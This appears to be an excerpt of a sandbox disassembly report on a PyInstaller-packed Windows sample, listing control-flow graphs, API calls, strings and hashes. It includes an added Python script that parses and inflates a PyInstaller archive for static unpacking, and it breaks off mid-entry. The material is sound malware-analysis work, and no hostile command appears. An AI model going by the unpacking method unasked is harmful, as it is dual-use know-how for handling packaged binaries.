                                                                                                                        control_flow_graph 53 7ff7a6731440-7ff7a6731457 call 7ff7a6736720 56 7ff7a6731459-7ff7a6731461 53->56 57 7ff7a6731462-7ff7a6731485 call 7ff7a6736a40 53->57 60 7ff7a67314a7-7ff7a67314ad 57->60 61 7ff7a6731487-7ff7a67314a2 call 7ff7a67324d0 57->61 63 7ff7a67314af-7ff7a67314ba call 7ff7a6733cb0 60->63 64 7ff7a67314e0-7ff7a67314f4 call 7ff7a673f934 60->64 69 7ff7a6731635-7ff7a6731647 61->69 70 7ff7a67314bf-7ff7a67314c5 63->70 71 7ff7a6731516-7ff7a673151a 64->71 72 7ff7a67314f6-7ff7a6731511 call 7ff7a67324d0 64->72 70->64 73 7ff7a67314c7-7ff7a67314db call 7ff7a6732770 70->73 75 7ff7a673151c-7ff7a6731528 call 7ff7a6731050 71->75 76 7ff7a6731534-7ff7a6731554 call 7ff7a67440b0 71->76 82 7ff7a6731617-7ff7a673161d 72->82 73->82 83 7ff7a673152d-7ff7a673152f 75->83 87 7ff7a6731575-7ff7a673157b 76->87 88 7ff7a6731556-7ff7a6731570 call 7ff7a67324d0 76->88 85 7ff7a673162b-7ff7a673162e call 7ff7a673f2ac 82->85 86 7ff7a673161f call 7ff7a673f2ac 82->86 83->82 98 7ff7a6731633 85->98 97 7ff7a6731624 86->97 89 7ff7a6731581-7ff7a6731586 87->89 90 7ff7a6731605-7ff7a6731608 call 7ff7a674409c 87->90 99 7ff7a673160d-7ff7a6731612 88->99 96 7ff7a6731590-7ff7a67315b2 call 7ff7a673f5fc 89->96 90->99 102 7ff7a67315e5-7ff7a67315ec 96->102 103 7ff7a67315b4-7ff7a67315cc call 7ff7a673fd3c 96->103 97->85 98->69 99->82 105 7ff7a67315f3-7ff7a67315fb call 7ff7a67324d0 102->105 108 7ff7a67315ce-7ff7a67315d1 103->108 109 7ff7a67315d5-7ff7a67315e3 103->109 111 7ff7a6731600 105->111 108->96 112 7ff7a67315d3 108->112 109->105 111->90 112->111
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                        • API String ID: 0-666925554
                                                                                                                        • Opcode ID: 180429b29ca1d9603c5cd193ccde240ee27283c29bb2ee97ca1237b7c6a23428
                                                                                                                        • Instruction ID: 101eaaf35552458a50f5d04ef593e7b20f06fbb4134ecdbf786d0cb2cafa1c48
                                                                                                                        • Opcode Fuzzy Hash: 180429b29ca1d9603c5cd193ccde240ee27283c29bb2ee97ca1237b7c6a23428
                                                                                                                        • Instruction Fuzzy Hash: 5451AE61B2A64281EA18BB519C246BBA390EF49FD4FC64431DE1D477B6EE3CE5458320

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                        • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                        • API String ID: 4998090-2855260032
                                                                                                                        • Opcode ID: bd17a40a22c884ade7d87aa0fec574675d56acca5ecee7ff6bf5a056ddc52e71
                                                                                                                        • Instruction ID: c42e09655af6c89c6abecfd9949a9ec1bd181b215644f0ce1fbc4eeb96f2839d
                                                                                                                        • Opcode Fuzzy Hash: bd17a40a22c884ade7d87aa0fec574675d56acca5ecee7ff6bf5a056ddc52e71
                                                                                                                        • Instruction Fuzzy Hash: E741633163D68282E750AF60EC646ABB361FB88B94F850231EA5E476F9DF3CD444C710

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                        • String ID: CreateProcessW$Error creating child process!
                                                                                                                        • API String ID: 2895956056-3524285272
                                                                                                                        • Opcode ID: 818e29d337d92c80142cd965dc47d4137e35c853672c1fb6e5a7bce6e7f526a1
                                                                                                                        • Instruction ID: aba20efd9a8ee31b21ba1a2660d9be1ba4eeee764f58ef9da0fa5fef49aef49d
                                                                                                                        • Opcode Fuzzy Hash: 818e29d337d92c80142cd965dc47d4137e35c853672c1fb6e5a7bce6e7f526a1
                                                                                                                        • Instruction Fuzzy Hash: 10413432A1978281DA14EB60EC652ABF364FB98764F910335E5AD436E9DF7CD0448B50

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 383 7ff7a6731000-7ff7a6733686 call 7ff7a673f080 call 7ff7a673f078 call 7ff7a6737600 call 7ff7a673f078 call 7ff7a673adb0 call 7ff7a6744270 call 7ff7a6744f14 call 7ff7a6731af0 401 7ff7a673379a 383->401 402 7ff7a673368c-7ff7a673369b call 7ff7a6733ba0 383->402 403 7ff7a673379f-7ff7a67337bf call 7ff7a673ad80 401->403 402->401 408 7ff7a67336a1-7ff7a67336b4 call 7ff7a6733a70 402->408 408->401 411 7ff7a67336ba-7ff7a67336cd call 7ff7a6733b20 408->411 411->401 414 7ff7a67336d3-7ff7a67336fa call 7ff7a6736990 411->414 417 7ff7a673373c-7ff7a6733764 call 7ff7a6736f90 call 7ff7a67319d0 414->417 418 7ff7a67336fc-7ff7a673370b call 7ff7a6736990 414->418 428 7ff7a673376a-7ff7a6733780 call 7ff7a67319d0 417->428 429 7ff7a673384d-7ff7a673385e 417->429 418->417 424 7ff7a673370d-7ff7a6733713 418->424 426 7ff7a673371f-7ff7a6733739 call 7ff7a674409c call 7ff7a6736f90 424->426 427 7ff7a6733715-7ff7a673371d 424->427 426->417 427->426 440 7ff7a6733782-7ff7a6733795 call 7ff7a6732770 428->440 441 7ff7a67337c0-7ff7a67337c3 428->441 433 7ff7a6733860-7ff7a673386a call 7ff7a6733280 429->433 434 7ff7a6733873-7ff7a673388b call 7ff7a6737a30 429->434 448 7ff7a67338ab-7ff7a67338b8 call 7ff7a6735e40 433->448 449 7ff7a673386c 433->449 444 7ff7a673388d-7ff7a6733899 call 7ff7a6732770 434->444 445 7ff7a673389e-7ff7a67338a5 SetDllDirectoryW 434->445 440->401 441->429 447 7ff7a67337c9-7ff7a67337e0 call 7ff7a6733cb0 441->447 444->401 445->448 456 7ff7a67337e7-7ff7a6733813 call 7ff7a6737200 447->456 457 7ff7a67337e2-7ff7a67337e5 447->457 458 7ff7a67338ba-7ff7a67338ca call 7ff7a6735ae0 448->458 459 7ff7a6733906-7ff7a673390b call 7ff7a6735dc0 448->459 449->434 468 7ff7a673383d-7ff7a673384b 456->468 469 7ff7a6733815-7ff7a673381d call 7ff7a673f2ac 456->469 460 7ff7a6733822-7ff7a6733838 call 7ff7a6732770 457->460 458->459 473 7ff7a67338cc-7ff7a67338db call 7ff7a6735640 458->473 466 7ff7a6733910-7ff7a6733913 459->466 460->401 471 7ff7a6733919-7ff7a6733926 466->471 472 7ff7a67339c6-7ff7a67339d5 call 7ff7a6733110 466->472 468->433 469->460 476 7ff7a6733930-7ff7a673393a 471->476 472->401 485 7ff7a67339db-7ff7a6733a12 call 7ff7a6736f20 call 7ff7a6736990 call 7ff7a67353e0 472->485 483 7ff7a67338dd-7ff7a67338e9 call 7ff7a67355d0 473->483 484 7ff7a67338fc-7ff7a6733901 call 7ff7a6735890 473->484 480 7ff7a673393c-7ff7a6733941 476->480 481 7ff7a6733943-7ff7a6733945 476->481 480->476 480->481 486 7ff7a6733947-7ff7a673396a call 7ff7a6731b30 481->486 487 7ff7a6733991-7ff7a67339c1 call 7ff7a6733270 call 7ff7a67330b0 call 7ff7a6733260 call 7ff7a6735890 call 7ff7a6735dc0 481->487 483->484 498 7ff7a67338eb-7ff7a67338fa call 7ff7a6735c90 483->498 484->459 485->401 510 7ff7a6733a18-7ff7a6733a4d call 7ff7a6733270 call 7ff7a6736fd0 call 7ff7a6735890 call 7ff7a6735dc0 485->510 486->401 497 7ff7a6733970-7ff7a673397b 486->497 487->403 501 7ff7a6733980-7ff7a673398f 497->501 498->466 501->487 501->501 523 7ff7a6733a57-7ff7a6733a5a call 7ff7a6731ab0 510->523 524 7ff7a6733a4f-7ff7a6733a52 call 7ff7a6736c90 510->524 527 7ff7a6733a5f-7ff7a6733a61 523->527 524->523 527->403
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00007FF7A6733BA0: GetModuleFileNameW.KERNEL32(?,00007FF7A6733699), ref: 00007FF7A6733BD1
                                                                                                                        • SetDllDirectoryW.KERNEL32 ref: 00007FF7A67338A5
                                                                                                                          • Part of subcall function 00007FF7A6736990: GetEnvironmentVariableW.KERNEL32(00007FF7A67336E7), ref: 00007FF7A67369CA
                                                                                                                          • Part of subcall function 00007FF7A6736990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7A67369E7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                        • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                        • API String ID: 2344891160-3602715111
                                                                                                                        • Opcode ID: 50111eb3a4ecf2aa9f2e8277530249e951fb5dfdc06a0922ff57c1695f9e45b2
                                                                                                                        • Instruction ID: 9eb20b3bf3a7c9a23ef7ac6b142d11b2463a19175ced19b6f49c20c246a9542e
                                                                                                                        • Opcode Fuzzy Hash: 50111eb3a4ecf2aa9f2e8277530249e951fb5dfdc06a0922ff57c1695f9e45b2
                                                                                                                        • Instruction Fuzzy Hash: 7BB1A811A3E68381FA28BB219D751FF9350BF48F94FC21135EA4D476BAEE2CE5058760

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 528 7ff7a6731050-7ff7a67310ab call 7ff7a673a610 531 7ff7a67310ad-7ff7a67310d2 call 7ff7a6732770 528->531 532 7ff7a67310d3-7ff7a67310eb call 7ff7a67440b0 528->532 537 7ff7a6731109-7ff7a6731119 call 7ff7a67440b0 532->537 538 7ff7a67310ed-7ff7a6731104 call 7ff7a67324d0 532->538 544 7ff7a6731137-7ff7a6731147 537->544 545 7ff7a673111b-7ff7a6731132 call 7ff7a67324d0 537->545 543 7ff7a673126c-7ff7a6731281 call 7ff7a673a2f0 call 7ff7a674409c * 2 538->543 560 7ff7a6731286-7ff7a67312a0 543->560 547 7ff7a6731150-7ff7a6731175 call 7ff7a673f5fc 544->547 545->543 554 7ff7a673125e 547->554 555 7ff7a673117b-7ff7a6731185 call 7ff7a673f370 547->555 557 7ff7a6731264 554->557 555->554 562 7ff7a673118b-7ff7a6731197 555->562 557->543 563 7ff7a67311a0-7ff7a67311c8 call 7ff7a6738a60 562->563 566 7ff7a67311ca-7ff7a67311cd 563->566 567 7ff7a6731241-7ff7a673125c call 7ff7a6732770 563->567 568 7ff7a673123c 566->568 569 7ff7a67311cf-7ff7a67311d9 566->569 567->557 568->567 571 7ff7a67311db-7ff7a67311e8 call 7ff7a673fd3c 569->571 572 7ff7a6731203-7ff7a6731206 569->572 578 7ff7a67311ed-7ff7a67311f0 571->578 575 7ff7a6731219-7ff7a673121e 572->575 576 7ff7a6731208-7ff7a6731216 call 7ff7a673bb60 572->576 575->563 577 7ff7a6731220-7ff7a6731223 575->577 576->575 580 7ff7a6731237-7ff7a673123a 577->580 581 7ff7a6731225-7ff7a6731228 577->581 582 7ff7a67311fe-7ff7a6731201 578->582 583 7ff7a67311f2-7ff7a67311fc call 7ff7a673f370 578->583 580->557 581->567 585 7ff7a673122a-7ff7a6731232 581->585 582->567 583->575 583->582 585->547
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message
                                                                                                                        • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                        • API String ID: 2030045667-1655038675
                                                                                                                        • Opcode ID: 2f46febe429223a823cb0d88def6e2cd0a3a4a90dbb08f42ff036ba8ee2fdb2c
                                                                                                                        • Instruction ID: bcc562503472fdcaaec9a9e1b0991e26ba5c198dd9fa88678a337bd1eaad9934
                                                                                                                        • Opcode Fuzzy Hash: 2f46febe429223a823cb0d88def6e2cd0a3a4a90dbb08f42ff036ba8ee2fdb2c
                                                                                                                        • Instruction Fuzzy Hash: A151E622B2A64281E624FB55AC603BBB390FB49F94F864131DE4D437A9EF3CE444C710
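The strings in this function and in the two archive functions above ("Failed to extract %s: failed to seek to the entry's data!", "Cannot open PyInstaller archive from executable (%s) or external archive (%s)", "inflateInit() failed with return code %d!", "1.2.13") are PyInstaller bootloader messages, so the bundled payload can be carved from the sample statically instead of letting the bootloader write it to a _MEI temp directory. The parser below is an added example and is not code from the Joe Sandbox report or from the sample. Its cookie and TOC layouts (big-endian fields, 8-byte MEI magic, 88-byte cookie at the end of the package, 18-byte TOC entry header padded to a multiple of 16) follow PyInstaller's public bootloader and CArchiveReader sources; it assumes the sample was built with a PyInstaller release that uses that layout, which the report does not state. The archive it parses is constructed in memory; on the real file, pass the executable's bytes to parse_archive.

```python
"""Parse a PyInstaller CArchive: locate the cookie, walk the TOC, inflate entries.

Added example, not code from the sandbox report or the sample.  Layouts follow
PyInstaller's public bootloader/CArchiveReader sources (assumption: the sample's
bootloader uses the 88-byte cookie with the python_libname field).
"""
import struct
import zlib

COOKIE_MAGIC = b"MEI\014\013\012\013\016"   # 8-byte magic that starts the cookie
COOKIE_FMT = "!8sIIIi64s"                   # magic, pkg_length, toc_offset, toc_length, python_version, pylib name
COOKIE_LEN = struct.calcsize(COOKIE_FMT)    # 88 bytes
TOC_FMT = "!iIIIBc"                         # entry_length, offset, len_compressed, len_uncompressed, compressed flag, typecode
TOC_HDR_LEN = struct.calcsize(TOC_FMT)      # 18 bytes, followed by the NUL-terminated name


def build_archive(entries, python_version=311, pylib=b"python311.dll"):
    """Assemble a minimal CArchive from (name, typecode, data, compress) tuples.

    Mirrors the writer's layout: data blobs first, then the TOC, then the cookie.
    TOC offsets are relative to the start of the package, not the file.
    """
    blobs = bytearray()
    toc = bytearray()
    for name, typecode, data, compress in entries:
        payload = zlib.compress(data) if compress else data
        enc_name = name.encode("utf-8") + b"\0"
        entry_len = TOC_HDR_LEN + len(enc_name)
        entry_len += (16 - entry_len % 16) % 16          # each TOC entry is padded to 16 bytes
        toc += struct.pack(TOC_FMT, entry_len, len(blobs), len(payload), len(data),
                           1 if compress else 0, typecode.encode())
        toc += enc_name.ljust(entry_len - TOC_HDR_LEN, b"\0")
        blobs += payload
    toc_offset = len(blobs)
    pkg_length = len(blobs) + len(toc) + COOKIE_LEN     # cookie counts toward the package length
    cookie = struct.pack(COOKIE_FMT, COOKIE_MAGIC, pkg_length, toc_offset, len(toc),
                         python_version, pylib)
    return bytes(blobs + toc + cookie)


def parse_archive(blob):
    """Return (python_version, pylib_name, {name: (typecode, data)}) for a CArchive.

    The package is normally appended to a PE, so the cookie is searched from the
    end and the package start is derived from pkg_length.  Every TOC field is
    bounds-checked against the file before it is used; a malformed archive raises
    ValueError rather than being trusted.
    """
    magic_pos = blob.rfind(COOKIE_MAGIC)
    if magic_pos < 0:
        raise ValueError("no PyInstaller cookie found")
    if magic_pos + COOKIE_LEN > len(blob):
        raise ValueError("truncated cookie")
    _magic, pkg_length, toc_offset, toc_length, pyver, pylib = struct.unpack(
        COOKIE_FMT, blob[magic_pos:magic_pos + COOKIE_LEN])
    pkg_start = magic_pos + COOKIE_LEN - pkg_length
    if pkg_start < 0 or toc_offset + toc_length > pkg_length:
        raise ValueError("cookie describes a package larger than the file")
    entries = {}
    pos = pkg_start + toc_offset
    end = pos + toc_length
    while pos < end:
        if pos + TOC_HDR_LEN > end:
            raise ValueError("TOC truncated")
        entry_len, off, clen, ulen, flag, typecode = struct.unpack(
            TOC_FMT, blob[pos:pos + TOC_HDR_LEN])
        if entry_len < TOC_HDR_LEN or pos + entry_len > end:
            raise ValueError("corrupt TOC entry length")
        name = blob[pos + TOC_HDR_LEN:pos + entry_len].rstrip(b"\0").decode("utf-8")
        data = blob[pkg_start + off:pkg_start + off + clen]
        if len(data) != clen:
            raise ValueError(f"entry {name}: data runs past end of package")
        if flag:                                         # zlib stream with header, as inflateInit() expects
            try:
                data = zlib.decompress(data)
            except zlib.error as exc:
                raise ValueError(f"entry {name}: inflate failed: {exc}") from exc
            if len(data) != ulen:
                raise ValueError(f"entry {name}: inflated size mismatch")
        entries[name] = (typecode.decode(), data)
        pos += entry_len
    return pyver, pylib.rstrip(b"\0").decode(), entries


# Constructed sample: one compressed script entry and one uncompressed data entry.
SAMPLE = build_archive([
    ("pyiboot01_bootstrap", "s", b"print('hello')\n" * 20, True),
    ("config.bin", "x", b"\x00\x01\x02\x03", False),
])

if __name__ == "__main__":
    version, libname, found = parse_archive(SAMPLE)
    print(f"python {version} ({libname})")
    for entry_name, (code, content) in found.items():
        print(f"  [{code}] {entry_name}: {len(content)} bytes")
```

Compressed entries are whole zlib streams, so zlib.decompress is enough; the bootloader's inflateInit()/chunked loop is only a streaming form of the same decode. A real archive also carries a PYZ entry (typecode 'z') that is itself a second container with its own table of contents; this example stops at the outer archive and does not unpack it.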

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00007FF7A674E152,?,?,-00000018,00007FF7A674A223,?,?,?,00007FF7A674A11A,?,?,?,00007FF7A6745472), ref: 00007FF7A674DF34
                                                                                                                        • GetProcAddress.KERNEL32(?,00000000,?,00007FF7A674E152,?,?,-00000018,00007FF7A674A223,?,?,?,00007FF7A674A11A,?,?,?,00007FF7A6745472), ref: 00007FF7A674DF40
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                        • Opcode ID: 01869d8b0b1ae08ce046380e8c955ca032c286979885a37836ee5a28d8bde6d1
                                                                                                                        • Instruction ID: 3346277ac3208dfb49394f40a9b8b44028532a1f97e6c12806a682e8c15bef82
                                                                                                                        • Opcode Fuzzy Hash: 01869d8b0b1ae08ce046380e8c955ca032c286979885a37836ee5a28d8bde6d1
                                                                                                                        • Instruction Fuzzy Hash: F441E121B3B62281FA56EB169C68577E391BF1CF90F8A4135DD5D477A8EE3CE8058220

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 686 7ff7a674af2c-7ff7a674af52 687 7ff7a674af6d-7ff7a674af71 686->687 688 7ff7a674af54-7ff7a674af68 call 7ff7a6744424 call 7ff7a6744444 686->688 689 7ff7a674b347-7ff7a674b353 call 7ff7a6744424 call 7ff7a6744444 687->689 690 7ff7a674af77-7ff7a674af7e 687->690 702 7ff7a674b35e 688->702 709 7ff7a674b359 call 7ff7a6749db0 689->709 690->689 692 7ff7a674af84-7ff7a674afb2 690->692 692->689 695 7ff7a674afb8-7ff7a674afbf 692->695 698 7ff7a674afd8-7ff7a674afdb 695->698 699 7ff7a674afc1-7ff7a674afd3 call 7ff7a6744424 call 7ff7a6744444 695->699 705 7ff7a674b343-7ff7a674b345 698->705 706 7ff7a674afe1-7ff7a674afe7 698->706 699->709 707 7ff7a674b361-7ff7a674b378 702->707 705->707 706->705 710 7ff7a674afed-7ff7a674aff0 706->710 709->702 710->699 713 7ff7a674aff2-7ff7a674b017 710->713 715 7ff7a674b019-7ff7a674b01b 713->715 716 7ff7a674b04a-7ff7a674b051 713->716 719 7ff7a674b01d-7ff7a674b024 715->719 720 7ff7a674b042-7ff7a674b048 715->720 717 7ff7a674b053-7ff7a674b07b call 7ff7a674cacc call 7ff7a6749e18 * 2 716->717 718 7ff7a674b026-7ff7a674b03d call 7ff7a6744424 call 7ff7a6744444 call 7ff7a6749db0 716->718 751 7ff7a674b07d-7ff7a674b093 call 7ff7a6744444 call 7ff7a6744424 717->751 752 7ff7a674b098-7ff7a674b0c3 call 7ff7a674b754 717->752 748 7ff7a674b1d0 718->748 719->718 719->720 722 7ff7a674b0c8-7ff7a674b0df 720->722 725 7ff7a674b15a-7ff7a674b164 call 7ff7a6752a3c 722->725 726 7ff7a674b0e1-7ff7a674b0e9 722->726 737 7ff7a674b1ee 725->737 738 7ff7a674b16a-7ff7a674b17f 725->738 726->725 730 7ff7a674b0eb-7ff7a674b0ed 726->730 730->725 734 7ff7a674b0ef-7ff7a674b105 730->734 734->725 739 7ff7a674b107-7ff7a674b113 734->739 741 7ff7a674b1f3-7ff7a674b213 ReadFile 737->741 738->737 743 7ff7a674b181-7ff7a674b193 GetConsoleMode 738->743 739->725 744 7ff7a674b115-7ff7a674b117 739->744 746 7ff7a674b30d-7ff7a674b316 GetLastError 741->746 747 7ff7a674b219-7ff7a674b221 741->747 743->737 749 7ff7a674b195-7ff7a674b19d 743->749 744->725 750 7ff7a674b119-7ff7a674b131 744->750 757 7ff7a674b318-7ff7a674b32e call 7ff7a6744444 call 7ff7a6744424 746->757 758 7ff7a674b333-7ff7a674b336 746->758 747->746 754 7ff7a674b227 747->754 759 7ff7a674b1d3-7ff7a674b1dd call 7ff7a6749e18 748->759 749->741 756 7ff7a674b19f-7ff7a674b1c1 ReadConsoleW 749->756 750->725 760 7ff7a674b133-7ff7a674b13f 750->760 751->748 752->722 764 7ff7a674b22e-7ff7a674b243 754->764 766 7ff7a674b1c3 GetLastError 756->766 767 7ff7a674b1e2-7ff7a674b1ec 756->767 757->748 761 7ff7a674b33c-7ff7a674b33e 758->761 762 7ff7a674b1c9-7ff7a674b1cb call 7ff7a67443b8 758->762 759->707 760->725 770 7ff7a674b141-7ff7a674b143 760->770 761->759 762->748 764->759 773 7ff7a674b245-7ff7a674b250 764->773 766->762 767->764 770->725 771 7ff7a674b145-7ff7a674b155 770->771 771->725 778 7ff7a674b277-7ff7a674b27f 773->778 779 7ff7a674b252-7ff7a674b26b call 7ff7a674ab44 773->779 782 7ff7a674b2fb-7ff7a674b308 call 7ff7a674a984 778->782 783 7ff7a674b281-7ff7a674b293 778->783 786 7ff7a674b270-7ff7a674b272 779->786 782->786 787 7ff7a674b2ee-7ff7a674b2f6 783->787 788 7ff7a674b295 783->788 786->759 787->759 790 7ff7a674b29a-7ff7a674b2a1 788->790 791 7ff7a674b2dd-7ff7a674b2e8 790->791 792 7ff7a674b2a3-7ff7a674b2a7 790->792 791->787 793 7ff7a674b2a9-7ff7a674b2b0 792->793 794 7ff7a674b2c3 792->794 793->794 796 7ff7a674b2b2-7ff7a674b2b6 793->796 795 7ff7a674b2c9-7ff7a674b2d9 794->795 795->790 798 7ff7a674b2db 795->798 796->794 797 7ff7a674b2b8-7ff7a674b2c1 796->797 797->795 798->787
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: 184652ea66a00c646f0d6e367f8fa0d47b8fb75159f9cd0cc9461bb9675fa9ff
